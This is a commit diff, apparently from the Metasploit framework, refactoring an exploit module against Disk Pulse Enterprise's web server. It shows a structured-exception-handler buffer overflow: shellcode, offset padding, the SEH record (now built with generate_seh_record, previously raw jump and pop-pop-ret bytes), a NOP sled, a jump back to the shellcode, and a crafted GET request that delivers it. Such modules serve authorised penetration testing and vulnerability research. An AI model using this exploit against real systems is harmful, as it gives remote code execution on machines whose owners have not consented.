added generate_seh_record

loftwing · loftwing · commit 65f2ee910972 · 2017-09-13T10:56:32.000-05:00
diff --git a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
@@ -32,7 +32,7 @@ def initialize(info = {})
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'none'
+          'EXITFUNC' => 'thread'
         },
       'Platform'       => 'win',
       'Payload'        =>
@@ -76,13 +76,12 @@ def exploit
     print_status("Generating exploit...")
     exp = payload.encoded
     exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
-    exp << "\xEB\x10\x90\x90" # nSEH - jmp short 0x12 down to next record
-    exp << "\xDD\xAD\x13\x10" # SEH  - pop ebx, pop ecx, retn - libspp.dll
-    exp << "\x90" * 10
+    exp << generate_seh_record(target.ret)
+    exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
     exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
-    exp << 'B' * (5000 - exp.length)
+    exp << 'B' * (5000 - exp.length) #padding
 
-    print_status("Sending exploit.")
+    print_status("Sending exploit...")
 
     res = send_request_cgi({
       'uri' => '/../' + exp,
